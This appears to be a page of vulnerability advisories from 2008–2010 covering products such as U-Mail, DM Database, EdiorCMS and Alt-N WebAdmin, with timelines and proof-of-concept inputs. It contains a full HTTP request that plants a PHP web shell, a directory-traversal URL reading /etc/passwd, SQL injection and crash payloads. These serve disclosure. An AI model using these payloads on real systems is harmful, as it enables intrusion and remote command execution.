RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities
Vulnerable: v3.0.7.x
Vendor: www.rj-itop.com
Category: Input Validation Error
Impact: SQL injection
Details:
=========
Multiple SQL Injection Vulnerabilities has been found in DRJ-iTop Network \
Vulnerability Scanner System, which can be exploited by malicious users to \
conduct SQL injection and script insertion attacks. Authentication is required to \
exploit these vulnerabilities.
POC:
=========
https://8.8.8.8/roleManager.jsp?type=query&id= [SQL Injection]
Timeline:
========
2009.10.19 Report to vendor (but vender did not respond)
2009.11.15 Report to vendor second times
2009.11.19 Report to CNNVD
2010.04.13 Public
DM Database Server Memory Corruption Vulnerability
========
Vulnerable:All Version
Vendor:www.dameng.com
Discovered by:Shennan Wang (HuaweiSymantec SRT)
CVE:CVE-2010-2159
Details:
=========
A vulnerability in DM Database Server all version allows attacker to execute \
arbitrary code or cause a DoS (Denial of Service).Authentication is required to exploit this vulnerability.
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.
POC:
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for \
C:\dmdbms\bin\wdm_dll.dll - wdm_dll+0xd1753:
100d1753 f2ae repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc "AAAAAAAAAAAAAAAAAAAA"
Timeline:
========
2010.04.17 Report to vendor,no response.
2010.05.31 Public
U-Mail Webmail Arbitrary File Write Vulnerability
==================================================
Vulnerable: U-Mail 4.91
Vendors:www.comingchina.com
Category: Input Validation Error
Impact:An attacker can write arbitrary data to new files.
Author:Shennan Wang
Date:2008-10-30
Web:http://hi.baidu.com/nansec
CVE:CVE-2008-4932
Details:
=========
This vulnerability allows remote attackers to write arbitrary file on vulnerable \
installations of U-Mail Webmail Server. Authentication is required to exploit this \
vulnerability.The specific flaw exists in the 'edit.php' file running on the U-Mail \
Webmail Server. A malicious HTTP POST request can write arbitrary file to the \
publicly accessible web directories.
Exploit:
=========
POST /webmail/modules/filesystem/edit.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, \
application/x-shockwave-flash, application/vnd.ms-excel, \
application/vnd.ms-powerpoint, application/msword, application/x-silverlight, \
application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, \
application/x-ms-application, */*
Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR \
2.0.50727; .NET CLR 3.0.04506.30)
Host: mail.d4rkn3t.cn
Content-Length: 120
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; \
PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18
path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=<?system($_GET[cmd \
]);?>
WkImgSrv.dll VERSION 7.03.0616.0
TEST ON IE7+XPSP2_CN
http://marc.info/?l=bugtraq&m=120845200813992&w=2
POC:
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language="JavaScript">
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
</body>
</html>
Directory traversal in EdiorCMS V3.0
Application: EdiorCMS V3.0
Vendor: http://www.edior.com
Versions: 3.0
Platforms: ALL
Bug: Directory traversal
Exploitation: remote
Date: 13 Mar 2008
Author: Shennan Wang
e-mail: wsn1983@gmail.com
POC: http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd
Vulnerable: v3.3.3
Vendor: www.altn.com
Category: Environment Error
Vulnerable
========
Alt-N WebAdmin 3.3.3
U-Mail for Windows V9.8
U-Mail GateWay for Windows V9.8
Details:
=========
A source code disclosure vulnerability exists with Alt-N WebAdmin Server.
Remote attacker can be exploited to disclose the source code by appending "%2e" or "%20" to a URI.
Test on U-Mail for Windows V9.8 and U-Mail GateWay for Windows V9.8
POC:
=========
http://ip:1000/login.wdm%20
http://ip:1000/login.wdm%2e
Reference:
=========
www.comingchina.com/download.html
http://www.nansec.com/
RSS Feed
